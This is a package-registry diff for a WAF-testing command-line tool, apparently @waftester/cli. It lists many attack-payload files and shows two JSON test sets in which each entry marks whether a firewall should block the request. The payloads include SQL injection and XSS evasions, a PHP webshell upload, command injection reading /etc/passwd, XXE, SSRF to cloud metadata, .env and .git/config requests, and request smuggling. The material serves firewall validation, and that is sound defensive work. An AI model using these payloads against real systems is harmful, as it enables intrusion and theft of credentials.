@waftester/cli 2.8.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/LICENSE +80 -0
- package/LICENSE-COMMUNITY +28 -0
- package/README.md +121 -0
- package/bin/cli.js +152 -0
- package/package.json +52 -0
- package/payloads/community/README.md +45 -0
- package/payloads/community/ai/ml-poisoning.json +173 -0
- package/payloads/community/ai/prompt-injection.json +247 -0
- package/payloads/community/ai/workflow-abuse.json +222 -0
- package/payloads/community/auth/jwt.json +855 -0
- package/payloads/community/auth/login-bypass.json +623 -0
- package/payloads/community/auth/mfa.json +402 -0
- package/payloads/community/auth/oauth.json +421 -0
- package/payloads/community/auth/open-redirect.json +1028 -0
- package/payloads/community/auth/session.json +404 -0
- package/payloads/community/cache/deception.json +402 -0
- package/payloads/community/cache/poisoning.json +403 -0
- package/payloads/community/deserialization/gadget.json +375 -0
- package/payloads/community/deserialization/prototype.json +370 -0
- package/payloads/community/fuzz/content-type.json +397 -0
- package/payloads/community/fuzz/headers.json +401 -0
- package/payloads/community/fuzz/methods.json +397 -0
- package/payloads/community/fuzz/obfuscation.json +362 -0
- package/payloads/community/fuzz/special-chars.json +740 -0
- package/payloads/community/fuzz/waf-bypass.json +452 -0
- package/payloads/community/graphql/batching-abuse.json +271 -0
- package/payloads/community/graphql/depth-limit.json +271 -0
- package/payloads/community/graphql/introspection.json +267 -0
- package/payloads/community/injection/crlf.json +569 -0
- package/payloads/community/injection/ldap.json +357 -0
- package/payloads/community/injection/nosqli.json +529 -0
- package/payloads/community/injection/oscmd.json +662 -0
- package/payloads/community/injection/rce-polyglots.json +452 -0
- package/payloads/community/injection/sqli.json +681 -0
- package/payloads/community/injection/ssti.json +584 -0
- package/payloads/community/injection/upload-attacks.json +632 -0
- package/payloads/community/injection/xpath.json +357 -0
- package/payloads/community/injection/xxe.json +716 -0
- package/payloads/community/logic/forced-browsing.json +405 -0
- package/payloads/community/logic/idor.json +1026 -0
- package/payloads/community/logic/privilege.json +337 -0
- package/payloads/community/media/exif-injection.json +225 -0
- package/payloads/community/media/metadata-poison.json +239 -0
- package/payloads/community/protocol/http-smuggling.json +798 -0
- package/payloads/community/protocol/http2-attacks.json +382 -0
- package/payloads/community/protocol/websocket-abuse.json +375 -0
- package/payloads/community/rate-limit/burst-simulation.json +286 -0
- package/payloads/community/rate-limit/bypass-attempts.json +326 -0
- package/payloads/community/rate-limit/zone-tests.json +332 -0
- package/payloads/community/services/authentik.json +415 -0
- package/payloads/community/services/immich.json +423 -0
- package/payloads/community/services/n8n.json +366 -0
- package/payloads/community/sqli-basic.json +182 -0
- package/payloads/community/ssrf/cloud-metadata.json +999 -0
- package/payloads/community/ssrf/dns-rebinding.json +503 -0
- package/payloads/community/ssrf/internal-networks.json +627 -0
- package/payloads/community/ssrf/protocol-smuggling.json +350 -0
- package/payloads/community/ssti/multi-language-templates.json +191 -0
- package/payloads/community/ssti/python-templates.json +200 -0
- package/payloads/community/traversal/basic.json +675 -0
- package/payloads/community/traversal/cloud-credentials.json +107 -0
- package/payloads/community/traversal/config-files.json +193 -0
- package/payloads/community/traversal/encoding.json +558 -0
- package/payloads/community/traversal/null-byte.json +105 -0
- package/payloads/community/traversal/symlink.json +93 -0
- package/payloads/community/traversal/unicode.json +134 -0
- package/payloads/community/traversal/unix-advanced.json +195 -0
- package/payloads/community/traversal/windows-advanced.json +195 -0
- package/payloads/community/waf-bypass/cloudflare-bypass.json +102 -0
- package/payloads/community/waf-bypass/encoding-bypass.json +120 -0
- package/payloads/community/waf-bypass/evasion-techniques.json +164 -0
- package/payloads/community/waf-bypass/hpp-bypass.json +92 -0
- package/payloads/community/waf-bypass/modsecurity-crs.json +220 -0
- package/payloads/community/waf-bypass/protocol-attacks.json +101 -0
- package/payloads/community/waf-bypass/sqlmap-tamper.json +252 -0
- package/payloads/community/waf-bypass/unicode-charset.json +152 -0
- package/payloads/community/waf-bypass/vendor-bypasses.json +72 -0
- package/payloads/community/waf-validation/README.md +172 -0
- package/payloads/community/waf-validation/bypass-techniques.json +272 -0
- package/payloads/community/waf-validation/custom-rules.json +952 -0
- package/payloads/community/waf-validation/evasion-techniques.json +272 -0
- package/payloads/community/waf-validation/modsecurity-core.json +151 -0
- package/payloads/community/waf-validation/owasp-top10.json +236 -0
- package/payloads/community/waf-validation/regression-tests.json +227 -0
- package/payloads/community/xss/csp-bypass.json +431 -0
- package/payloads/community/xss/dom.json +389 -0
- package/payloads/community/xss/filter-bypass.json +1242 -0
- package/payloads/community/xss/mutation.json +263 -0
- package/payloads/community/xss/polyglots.json +371 -0
- package/payloads/community/xss/reflected.json +187 -0
- package/payloads/community/xss/stored.json +330 -0
- package/payloads/crlf-injection.json +182 -0
- package/payloads/ids-map.json +155 -0
- package/payloads/ldap-injection.json +182 -0
- package/payloads/nosql-injection.json +227 -0
- package/payloads/prototype-pollution.json +182 -0
- package/payloads/request-smuggling.json +182 -0
- package/payloads/version.json +28 -0
- package/payloads/xss-advanced.json +227 -0
- package/templates/README.md +221 -0
- package/templates/nuclei/http/waf-bypass/crlf-bypass.yaml +146 -0
- package/templates/nuclei/http/waf-bypass/lfi-bypass.yaml +152 -0
- package/templates/nuclei/http/waf-bypass/nosqli-bypass.yaml +166 -0
- package/templates/nuclei/http/waf-bypass/rce-bypass.yaml +171 -0
- package/templates/nuclei/http/waf-bypass/sqli-basic.yaml +142 -0
- package/templates/nuclei/http/waf-bypass/sqli-evasion.yaml +192 -0
- package/templates/nuclei/http/waf-bypass/ssrf-bypass.yaml +130 -0
- package/templates/nuclei/http/waf-bypass/ssti-bypass.yaml +147 -0
- package/templates/nuclei/http/waf-bypass/xss-basic.yaml +163 -0
- package/templates/nuclei/http/waf-bypass/xss-evasion.yaml +217 -0
- package/templates/nuclei/http/waf-bypass/xxe-bypass.yaml +204 -0
- package/templates/nuclei/http/waf-detection/akamai-detect.yaml +105 -0
- package/templates/nuclei/http/waf-detection/aws-waf-detect.yaml +115 -0
- package/templates/nuclei/http/waf-detection/azure-waf-detect.yaml +114 -0
- package/templates/nuclei/http/waf-detection/cloudflare-detect.yaml +121 -0
- package/templates/nuclei/http/waf-detection/modsecurity-detect.yaml +129 -0
- package/templates/nuclei/workflows/waf-assessment-workflow.yaml +71 -0
- package/templates/output/asff.tmpl +61 -0
- package/templates/output/csv.tmpl +4 -0
- package/templates/output/junit.tmpl +34 -0
- package/templates/output/markdown-report.tmpl +92 -0
- package/templates/output/slack-notification.tmpl +95 -0
- package/templates/output/text-summary.tmpl +56 -0
- package/templates/overrides/api-only.yaml +130 -0
- package/templates/overrides/crs-tuning.yaml +204 -0
- package/templates/overrides/false-positive-suppression.yaml +159 -0
- package/templates/policies/owasp-top10.yaml +152 -0
- package/templates/policies/pci-dss.yaml +124 -0
- package/templates/policies/permissive.yaml +40 -0
- package/templates/policies/standard.yaml +57 -0
- package/templates/policies/strict.yaml +72 -0
- package/templates/report-configs/compliance.yaml +173 -0
- package/templates/report-configs/dark.yaml +136 -0
- package/templates/report-configs/enterprise.yaml +175 -0
- package/templates/report-configs/minimal.yaml +84 -0
- package/templates/report-configs/print.yaml +139 -0
- package/templates/workflows/api-scan.yaml +132 -0
- package/templates/workflows/ci-gate.yaml +129 -0
- package/templates/workflows/full-scan.yaml +133 -0
- package/templates/workflows/quick-probe.yaml +80 -0
- package/templates/workflows/waf-detection.yaml +89 -0
|
@@ -0,0 +1,272 @@
|
|
|
1
|
+
[
|
|
2
|
+
{
|
|
3
|
+
"id": "EVASION-CHUNKED-001",
|
|
4
|
+
"payload": "POST /api/data HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n5\r\n<scri\r\n7\r\npt>alert\r\n4\r\n(1)</\r\n7\r\nscript>\r\n0\r\n\r\n",
|
|
5
|
+
"tags": ["evasion", "chunked", "xss", "advanced"],
|
|
6
|
+
"expected_block": true,
|
|
7
|
+
"severity_hint": "Critical",
|
|
8
|
+
"notes": "Chunked transfer encoding to split XSS payload across chunks",
|
|
9
|
+
"category": "WAF-Bypass"
|
|
10
|
+
},
|
|
11
|
+
{
|
|
12
|
+
"id": "WAFVAL-MULTILINE-001",
|
|
13
|
+
"payload": "GET /api/search?q=SE\r\nLECT%20*%20FROM%20users",
|
|
14
|
+
"tags": ["evasion", "multiline", "sqli", "advanced"],
|
|
15
|
+
"expected_block": true,
|
|
16
|
+
"severity_hint": "Critical",
|
|
17
|
+
"notes": "CRLF injection to split SQL keyword across lines",
|
|
18
|
+
"category": "WAF-Bypass"
|
|
19
|
+
},
|
|
20
|
+
{
|
|
21
|
+
"id": "WAFVAL-CONCAT-001",
|
|
22
|
+
"payload": "GET /api/search?q=SEL'+'ECT * FROM users",
|
|
23
|
+
"tags": ["evasion", "concatenation", "sqli", "advanced"],
|
|
24
|
+
"expected_block": true,
|
|
25
|
+
"severity_hint": "Critical",
|
|
26
|
+
"notes": "String concatenation to bypass keyword detection",
|
|
27
|
+
"category": "WAF-Bypass"
|
|
28
|
+
},
|
|
29
|
+
{
|
|
30
|
+
"id": "EVASION-CONCAT-002",
|
|
31
|
+
"payload": "GET /api/search?q=SEL||ECT%20*%20FROM%20users",
|
|
32
|
+
"tags": ["evasion", "concatenation", "sqli", "advanced"],
|
|
33
|
+
"expected_block": true,
|
|
34
|
+
"severity_hint": "Critical",
|
|
35
|
+
"notes": "Oracle-style concatenation bypass",
|
|
36
|
+
"category": "WAF-Bypass"
|
|
37
|
+
},
|
|
38
|
+
{
|
|
39
|
+
"id": "EVASION-SCIENTIFIC-001",
|
|
40
|
+
"payload": "GET /api/users?id=1e0UNION%20SELECT%20*%20FROM%20users",
|
|
41
|
+
"tags": ["evasion", "scientific-notation", "sqli", "advanced"],
|
|
42
|
+
"expected_block": true,
|
|
43
|
+
"severity_hint": "Critical",
|
|
44
|
+
"notes": "Scientific notation to join SQL keywords without space",
|
|
45
|
+
"category": "WAF-Bypass"
|
|
46
|
+
},
|
|
47
|
+
{
|
|
48
|
+
"id": "EVASION-BUFFER-001",
|
|
49
|
+
"payload": "GET /api/search?q=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' OR '1'='1",
|
|
50
|
+
"tags": ["evasion", "buffer-overflow", "sqli", "advanced"],
|
|
51
|
+
"expected_block": true,
|
|
52
|
+
"severity_hint": "Critical",
|
|
53
|
+
"notes": "Long string padding to overflow WAF buffer",
|
|
54
|
+
"category": "WAF-Bypass"
|
|
55
|
+
},
|
|
56
|
+
{
|
|
57
|
+
"id": "EVASION-TIMING-001",
|
|
58
|
+
"payload": "POST /api/login HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\nusername=admin' AND SLEEP(5)--&password=test",
|
|
59
|
+
"tags": ["evasion", "content-length", "sqli", "advanced"],
|
|
60
|
+
"expected_block": true,
|
|
61
|
+
"severity_hint": "Critical",
|
|
62
|
+
"notes": "Content-Length mismatch to bypass body inspection",
|
|
63
|
+
"category": "WAF-Bypass"
|
|
64
|
+
},
|
|
65
|
+
{
|
|
66
|
+
"id": "EVASION-JSON-001",
|
|
67
|
+
"payload": "POST /api/data HTTP/1.1\r\nContent-Type: application/json\r\n\r\n{\"query\":\"1' OR '1'='1\",\"bypass\":true}",
|
|
68
|
+
"tags": ["evasion", "json", "sqli", "advanced"],
|
|
69
|
+
"expected_block": true,
|
|
70
|
+
"severity_hint": "Critical",
|
|
71
|
+
"notes": "SQL injection in JSON body",
|
|
72
|
+
"category": "WAF-Bypass"
|
|
73
|
+
},
|
|
74
|
+
{
|
|
75
|
+
"id": "EVASION-JSON-002",
|
|
76
|
+
"payload": "POST /api/data HTTP/1.1\r\nContent-Type: application/json\r\n\r\n{\"query\":{\"$gt\":\"\"}}",
|
|
77
|
+
"tags": ["evasion", "json", "nosqli", "advanced"],
|
|
78
|
+
"expected_block": true,
|
|
79
|
+
"severity_hint": "Critical",
|
|
80
|
+
"notes": "NoSQL injection via JSON operator",
|
|
81
|
+
"category": "WAF-Bypass"
|
|
82
|
+
},
|
|
83
|
+
{
|
|
84
|
+
"id": "EVASION-MULTIPART-001",
|
|
85
|
+
"payload": "POST /api/upload HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=----X\r\n\r\n------X\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.php\"\r\nContent-Type: image/jpeg\r\n\r\n<?php system($_GET['c']); ?>\r\n------X--",
|
|
86
|
+
"tags": ["evasion", "multipart", "rce", "advanced"],
|
|
87
|
+
"expected_block": true,
|
|
88
|
+
"severity_hint": "Critical",
|
|
89
|
+
"notes": "PHP webshell in multipart upload with fake content-type",
|
|
90
|
+
"category": "WAF-Bypass"
|
|
91
|
+
},
|
|
92
|
+
{
|
|
93
|
+
"id": "EVASION-MULTIPART-002",
|
|
94
|
+
"payload": "POST /api/upload HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=----X\r\n\r\n------X\r\nContent-Disposition: form-data; name=\"data\"\r\n\r\n<script>alert(1)</script>\r\n------X--",
|
|
95
|
+
"tags": ["evasion", "multipart", "xss", "advanced"],
|
|
96
|
+
"expected_block": true,
|
|
97
|
+
"severity_hint": "High",
|
|
98
|
+
"notes": "XSS in multipart form field",
|
|
99
|
+
"category": "WAF-Bypass"
|
|
100
|
+
},
|
|
101
|
+
{
|
|
102
|
+
"id": "EVASION-CHARSET-001",
|
|
103
|
+
"payload": "GET /api/search?q=%u003Cscript%u003Ealert(1)%u003C/script%u003E",
|
|
104
|
+
"tags": ["evasion", "charset", "xss", "iis", "advanced"],
|
|
105
|
+
"expected_block": true,
|
|
106
|
+
"severity_hint": "Critical",
|
|
107
|
+
"notes": "IIS %u encoding bypass",
|
|
108
|
+
"category": "WAF-Bypass"
|
|
109
|
+
},
|
|
110
|
+
{
|
|
111
|
+
"id": "EVASION-CHARSET-002",
|
|
112
|
+
"payload": "GET /api/search?q=\\x3Cscript\\x3Ealert(1)\\x3C/script\\x3E",
|
|
113
|
+
"tags": ["evasion", "charset", "xss", "hex", "advanced"],
|
|
114
|
+
"expected_block": true,
|
|
115
|
+
"severity_hint": "Critical",
|
|
116
|
+
"notes": "Hex escape sequence XSS",
|
|
117
|
+
"category": "WAF-Bypass"
|
|
118
|
+
},
|
|
119
|
+
{
|
|
120
|
+
"id": "EVASION-UTF7-001",
|
|
121
|
+
"payload": "GET /api/search?q=+ADw-script+AD4-alert(1)+ADw-/script+AD4-",
|
|
122
|
+
"tags": ["evasion", "utf7", "xss", "advanced"],
|
|
123
|
+
"expected_block": true,
|
|
124
|
+
"severity_hint": "Critical",
|
|
125
|
+
"notes": "UTF-7 encoded XSS",
|
|
126
|
+
"category": "WAF-Bypass"
|
|
127
|
+
},
|
|
128
|
+
{
|
|
129
|
+
"id": "EVASION-PUNYCODE-001",
|
|
130
|
+
"payload": "GET / HTTP/1.1\r\nHost: xn--e1afmkfd.xn--p1ai",
|
|
131
|
+
"tags": ["evasion", "punycode", "dns", "advanced"],
|
|
132
|
+
"expected_block": false,
|
|
133
|
+
"severity_hint": "Low",
|
|
134
|
+
"notes": "Punycode domain - may be legitimate IDN",
|
|
135
|
+
"category": "WAF-Bypass"
|
|
136
|
+
},
|
|
137
|
+
{
|
|
138
|
+
"id": "EVASION-OVERLONG-001",
|
|
139
|
+
"payload": "GET /api/search?q=%c0%ae%c0%ae%c0%af/etc/passwd",
|
|
140
|
+
"tags": ["evasion", "overlong-utf8", "traversal", "advanced"],
|
|
141
|
+
"expected_block": true,
|
|
142
|
+
"severity_hint": "Critical",
|
|
143
|
+
"notes": "Overlong UTF-8 encoding for path traversal (../ = %c0%ae%c0%ae%c0%af)",
|
|
144
|
+
"category": "WAF-Bypass"
|
|
145
|
+
},
|
|
146
|
+
{
|
|
147
|
+
"id": "EVASION-NORMALIZATION-001",
|
|
148
|
+
"payload": "GET /api/search?q=select%20*%20from%20users",
|
|
149
|
+
"tags": ["evasion", "fullwidth", "sqli", "unicode", "advanced"],
|
|
150
|
+
"expected_block": true,
|
|
151
|
+
"severity_hint": "Critical",
|
|
152
|
+
"notes": "Fullwidth Unicode characters for SQL keywords",
|
|
153
|
+
"category": "WAF-Bypass"
|
|
154
|
+
},
|
|
155
|
+
{
|
|
156
|
+
"id": "EVASION-NORMALIZATION-002",
|
|
157
|
+
"payload": "GET /api/search?q=%EF%BC%9Cscript%EF%BC%9Ealert(1)%EF%BC%9C/script%EF%BC%9E",
|
|
158
|
+
"tags": ["evasion", "fullwidth", "xss", "unicode", "advanced"],
|
|
159
|
+
"expected_block": true,
|
|
160
|
+
"severity_hint": "Critical",
|
|
161
|
+
"notes": "Fullwidth angle brackets for XSS",
|
|
162
|
+
"category": "WAF-Bypass"
|
|
163
|
+
},
|
|
164
|
+
{
|
|
165
|
+
"id": "EVASION-VERB-001",
|
|
166
|
+
"payload": "FOOBAR /api/admin HTTP/1.1\r\nX-HTTP-Method-Override: DELETE\r\nHost: target.com",
|
|
167
|
+
"tags": ["evasion", "method-override", "access-control", "advanced"],
|
|
168
|
+
"expected_block": true,
|
|
169
|
+
"severity_hint": "High",
|
|
170
|
+
"notes": "HTTP method override header with invalid verb",
|
|
171
|
+
"category": "WAF-Bypass"
|
|
172
|
+
},
|
|
173
|
+
{
|
|
174
|
+
"id": "EVASION-VERB-002",
|
|
175
|
+
"payload": "POST /api/data HTTP/1.1\r\nX-HTTP-Method: PUT\r\nX-Method-Override: DELETE\r\nContent-Type: application/json\r\n\r\n{}",
|
|
176
|
+
"tags": ["evasion", "method-override", "access-control", "advanced"],
|
|
177
|
+
"expected_block": true,
|
|
178
|
+
"severity_hint": "High",
|
|
179
|
+
"notes": "Multiple method override headers",
|
|
180
|
+
"category": "WAF-Bypass"
|
|
181
|
+
},
|
|
182
|
+
{
|
|
183
|
+
"id": "EVASION-PATHCONF-001",
|
|
184
|
+
"payload": "GET /api;/admin HTTP/1.1",
|
|
185
|
+
"tags": ["evasion", "path-confusion", "access-control", "tomcat", "advanced"],
|
|
186
|
+
"expected_block": true,
|
|
187
|
+
"severity_hint": "High",
|
|
188
|
+
"notes": "Tomcat/Spring path parameter confusion",
|
|
189
|
+
"category": "WAF-Bypass"
|
|
190
|
+
},
|
|
191
|
+
{
|
|
192
|
+
"id": "EVASION-PATHCONF-002",
|
|
193
|
+
"payload": "GET /api%2fadmin HTTP/1.1",
|
|
194
|
+
"tags": ["evasion", "path-confusion", "access-control", "advanced"],
|
|
195
|
+
"expected_block": true,
|
|
196
|
+
"severity_hint": "High",
|
|
197
|
+
"notes": "URL-encoded path separator",
|
|
198
|
+
"category": "WAF-Bypass"
|
|
199
|
+
},
|
|
200
|
+
{
|
|
201
|
+
"id": "EVASION-PATHCONF-003",
|
|
202
|
+
"payload": "GET /api\\admin HTTP/1.1",
|
|
203
|
+
"tags": ["evasion", "path-confusion", "access-control", "windows", "advanced"],
|
|
204
|
+
"expected_block": true,
|
|
205
|
+
"severity_hint": "High",
|
|
206
|
+
"notes": "Backslash path separator (Windows)",
|
|
207
|
+
"category": "WAF-Bypass"
|
|
208
|
+
},
|
|
209
|
+
{
|
|
210
|
+
"id": "EVASION-CACHE-001",
|
|
211
|
+
"payload": "GET /api/search?q=test HTTP/1.1\r\nX-Original-URL: /admin\r\nHost: target.com",
|
|
212
|
+
"tags": ["evasion", "cache", "path-override", "advanced"],
|
|
213
|
+
"expected_block": true,
|
|
214
|
+
"severity_hint": "High",
|
|
215
|
+
"notes": "X-Original-URL header to bypass path restrictions",
|
|
216
|
+
"category": "WAF-Bypass"
|
|
217
|
+
},
|
|
218
|
+
{
|
|
219
|
+
"id": "EVASION-CACHE-002",
|
|
220
|
+
"payload": "GET /api/search?q=test HTTP/1.1\r\nX-Rewrite-URL: /admin\r\nHost: target.com",
|
|
221
|
+
"tags": ["evasion", "cache", "path-override", "advanced"],
|
|
222
|
+
"expected_block": true,
|
|
223
|
+
"severity_hint": "High",
|
|
224
|
+
"notes": "X-Rewrite-URL header to bypass path restrictions",
|
|
225
|
+
"category": "WAF-Bypass"
|
|
226
|
+
},
|
|
227
|
+
{
|
|
228
|
+
"id": "EVASION-FRAGMENT-001",
|
|
229
|
+
"payload": "GET /api/search?q=test#<script>alert(1)</script>",
|
|
230
|
+
"tags": ["evasion", "fragment", "xss", "advanced"],
|
|
231
|
+
"expected_block": true,
|
|
232
|
+
"severity_hint": "Medium",
|
|
233
|
+
"notes": "XSS in URL fragment (client-side only)",
|
|
234
|
+
"category": "WAF-Bypass"
|
|
235
|
+
},
|
|
236
|
+
{
|
|
237
|
+
"id": "WAFVAL-PROTO-001",
|
|
238
|
+
"payload": "POST /api/data HTTP/1.0\r\nContent-Type: application/json\r\n\r\n{\"query\":\"' OR '1'='1\"}",
|
|
239
|
+
"tags": ["evasion", "http1.0", "sqli", "advanced"],
|
|
240
|
+
"expected_block": true,
|
|
241
|
+
"severity_hint": "Critical",
|
|
242
|
+
"notes": "HTTP/1.0 protocol downgrade with injection",
|
|
243
|
+
"category": "WAF-Bypass"
|
|
244
|
+
},
|
|
245
|
+
{
|
|
246
|
+
"id": "EVASION-PROTO-002",
|
|
247
|
+
"payload": "PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n",
|
|
248
|
+
"tags": ["evasion", "http2", "protocol", "advanced"],
|
|
249
|
+
"expected_block": false,
|
|
250
|
+
"severity_hint": "Low",
|
|
251
|
+
"notes": "HTTP/2 connection preface (informational)",
|
|
252
|
+
"category": "WAF-Bypass"
|
|
253
|
+
},
|
|
254
|
+
{
|
|
255
|
+
"id": "EVASION-SMUGGLE-001",
|
|
256
|
+
"payload": "POST / HTTP/1.1\r\nHost: target.com\r\nContent-Length: 6\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nG",
|
|
257
|
+
"tags": ["evasion", "smuggling", "cl-te", "advanced", "quick"],
|
|
258
|
+
"expected_block": true,
|
|
259
|
+
"severity_hint": "Critical",
|
|
260
|
+
"notes": "CL.TE HTTP request smuggling attempt",
|
|
261
|
+
"category": "WAF-Bypass"
|
|
262
|
+
},
|
|
263
|
+
{
|
|
264
|
+
"id": "EVASION-SMUGGLE-002",
|
|
265
|
+
"payload": "POST / HTTP/1.1\r\nHost: target.com\r\nTransfer-Encoding: chunked\r\nContent-Length: 4\r\n\r\n5c\r\nGPOST / HTTP/1.1\r\nHost: target.com\r\nContent-Length: 10\r\n\r\ntest\r\n0\r\n\r\n",
|
|
266
|
+
"tags": ["evasion", "smuggling", "te-cl", "advanced", "quick"],
|
|
267
|
+
"expected_block": true,
|
|
268
|
+
"severity_hint": "Critical",
|
|
269
|
+
"notes": "TE.CL HTTP request smuggling attempt",
|
|
270
|
+
"category": "WAF-Bypass"
|
|
271
|
+
}
|
|
272
|
+
]
|
|
@@ -0,0 +1,151 @@
|
|
|
1
|
+
[
|
|
2
|
+
{
|
|
3
|
+
"id": "WAF-CORE-001",
|
|
4
|
+
"payload": "GET /?id=1' OR '1'='1",
|
|
5
|
+
"tags": ["waf-validation", "sqli", "quick", "crs-942"],
|
|
6
|
+
"expected_block": true,
|
|
7
|
+
"severity_hint": "Critical",
|
|
8
|
+
"notes": "CRS 942100-942999: SQL Injection detection",
|
|
9
|
+
"category": "WAF-Validation",
|
|
10
|
+
"crs_rule": "942100"
|
|
11
|
+
},
|
|
12
|
+
{
|
|
13
|
+
"id": "WAF-CORE-002",
|
|
14
|
+
"payload": "GET /?q=<script>alert(1)</script>",
|
|
15
|
+
"tags": ["waf-validation", "xss", "quick", "crs-941"],
|
|
16
|
+
"expected_block": true,
|
|
17
|
+
"severity_hint": "Critical",
|
|
18
|
+
"notes": "CRS 941100-941999: XSS detection",
|
|
19
|
+
"category": "WAF-Validation",
|
|
20
|
+
"crs_rule": "941100"
|
|
21
|
+
},
|
|
22
|
+
{
|
|
23
|
+
"id": "WAF-CORE-003",
|
|
24
|
+
"payload": "GET /etc/passwd",
|
|
25
|
+
"tags": ["waf-validation", "lfi", "quick", "crs-930"],
|
|
26
|
+
"expected_block": true,
|
|
27
|
+
"severity_hint": "Critical",
|
|
28
|
+
"notes": "CRS 930100-930999: Local File Inclusion",
|
|
29
|
+
"category": "WAF-Validation",
|
|
30
|
+
"crs_rule": "930100"
|
|
31
|
+
},
|
|
32
|
+
{
|
|
33
|
+
"id": "WAF-CORE-004",
|
|
34
|
+
"payload": "GET /?url=http://169.254.169.254/",
|
|
35
|
+
"tags": ["waf-validation", "ssrf", "quick", "crs-934"],
|
|
36
|
+
"expected_block": true,
|
|
37
|
+
"severity_hint": "Critical",
|
|
38
|
+
"notes": "CRS 934100: SSRF to AWS metadata endpoint",
|
|
39
|
+
"category": "WAF-Validation",
|
|
40
|
+
"crs_rule": "934100"
|
|
41
|
+
},
|
|
42
|
+
{
|
|
43
|
+
"id": "WAF-CORE-005",
|
|
44
|
+
"payload": "GET /?cmd=;cat /etc/passwd",
|
|
45
|
+
"tags": ["waf-validation", "rce", "quick", "crs-932"],
|
|
46
|
+
"expected_block": true,
|
|
47
|
+
"severity_hint": "Critical",
|
|
48
|
+
"notes": "CRS 932100-932999: Remote Code Execution",
|
|
49
|
+
"category": "WAF-Validation",
|
|
50
|
+
"crs_rule": "932100"
|
|
51
|
+
},
|
|
52
|
+
{
|
|
53
|
+
"id": "WAF-CORE-006",
|
|
54
|
+
"payload": "POST / HTTP/1.1\r\nContent-Type: application/xml\r\n\r\n<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>",
|
|
55
|
+
"tags": ["waf-validation", "xxe", "quick", "crs-931"],
|
|
56
|
+
"expected_block": true,
|
|
57
|
+
"severity_hint": "Critical",
|
|
58
|
+
"notes": "CRS 931100-931999: XXE detection",
|
|
59
|
+
"category": "WAF-Validation",
|
|
60
|
+
"crs_rule": "931100"
|
|
61
|
+
},
|
|
62
|
+
{
|
|
63
|
+
"id": "WAF-CORE-007",
|
|
64
|
+
"payload": "GET /?file=....//....//etc/passwd",
|
|
65
|
+
"tags": ["waf-validation", "traversal", "quick", "crs-930"],
|
|
66
|
+
"expected_block": true,
|
|
67
|
+
"severity_hint": "Critical",
|
|
68
|
+
"notes": "CRS 930110: Path Traversal with encoding",
|
|
69
|
+
"category": "WAF-Validation",
|
|
70
|
+
"crs_rule": "930110"
|
|
71
|
+
},
|
|
72
|
+
{
|
|
73
|
+
"id": "WAF-CORE-008",
|
|
74
|
+
"payload": "GET /?callback=<script>alert(document.domain)</script>",
|
|
75
|
+
"tags": ["waf-validation", "xss", "jsonp", "crs-941"],
|
|
76
|
+
"expected_block": true,
|
|
77
|
+
"severity_hint": "High",
|
|
78
|
+
"notes": "CRS 941: JSONP callback XSS",
|
|
79
|
+
"category": "WAF-Validation",
|
|
80
|
+
"crs_rule": "941160"
|
|
81
|
+
},
|
|
82
|
+
{
|
|
83
|
+
"id": "WAF-CORE-009",
|
|
84
|
+
"payload": "GET /?search={{7*7}}",
|
|
85
|
+
"tags": ["waf-validation", "ssti", "quick", "crs-944"],
|
|
86
|
+
"expected_block": true,
|
|
87
|
+
"severity_hint": "Critical",
|
|
88
|
+
"notes": "CRS 944: Server-Side Template Injection",
|
|
89
|
+
"category": "WAF-Validation",
|
|
90
|
+
"crs_rule": "944100"
|
|
91
|
+
},
|
|
92
|
+
{
|
|
93
|
+
"id": "WAF-CORE-010",
|
|
94
|
+
"payload": "GET /?data=O:8:\"stdClass\":0:{}",
|
|
95
|
+
"tags": ["waf-validation", "deserialization", "quick", "crs-944"],
|
|
96
|
+
"expected_block": true,
|
|
97
|
+
"severity_hint": "Critical",
|
|
98
|
+
"notes": "CRS 944: PHP Object Injection",
|
|
99
|
+
"category": "WAF-Validation",
|
|
100
|
+
"crs_rule": "944120"
|
|
101
|
+
},
|
|
102
|
+
{
|
|
103
|
+
"id": "WAF-CORE-011",
|
|
104
|
+
"payload": "GET / HTTP/1.1\r\nHost: target\r\nUser-Agent: sqlmap/1.0",
|
|
105
|
+
"tags": ["waf-validation", "scanner", "quick", "crs-913"],
|
|
106
|
+
"expected_block": true,
|
|
107
|
+
"severity_hint": "High",
|
|
108
|
+
"notes": "CRS 913100: Scanner detection (sqlmap)",
|
|
109
|
+
"category": "WAF-Validation",
|
|
110
|
+
"crs_rule": "913100"
|
|
111
|
+
},
|
|
112
|
+
{
|
|
113
|
+
"id": "WAF-CORE-012",
|
|
114
|
+
"payload": "GET / HTTP/1.1\r\nHost: target\r\nUser-Agent: Nikto",
|
|
115
|
+
"tags": ["waf-validation", "scanner", "quick", "crs-913"],
|
|
116
|
+
"expected_block": true,
|
|
117
|
+
"severity_hint": "High",
|
|
118
|
+
"notes": "CRS 913100: Scanner detection (Nikto)",
|
|
119
|
+
"category": "WAF-Validation",
|
|
120
|
+
"crs_rule": "913100"
|
|
121
|
+
},
|
|
122
|
+
{
|
|
123
|
+
"id": "WAF-CORE-013",
|
|
124
|
+
"payload": "GET /.git/config",
|
|
125
|
+
"tags": ["waf-validation", "exposure", "quick", "crs-930"],
|
|
126
|
+
"expected_block": true,
|
|
127
|
+
"severity_hint": "High",
|
|
128
|
+
"notes": "CRS 930120: Sensitive file access",
|
|
129
|
+
"category": "WAF-Validation",
|
|
130
|
+
"crs_rule": "930120"
|
|
131
|
+
},
|
|
132
|
+
{
|
|
133
|
+
"id": "WAF-CORE-014",
|
|
134
|
+
"payload": "GET /.env",
|
|
135
|
+
"tags": ["waf-validation", "exposure", "quick", "crs-930"],
|
|
136
|
+
"expected_block": true,
|
|
137
|
+
"severity_hint": "High",
|
|
138
|
+
"notes": "CRS 930130: Environment file access",
|
|
139
|
+
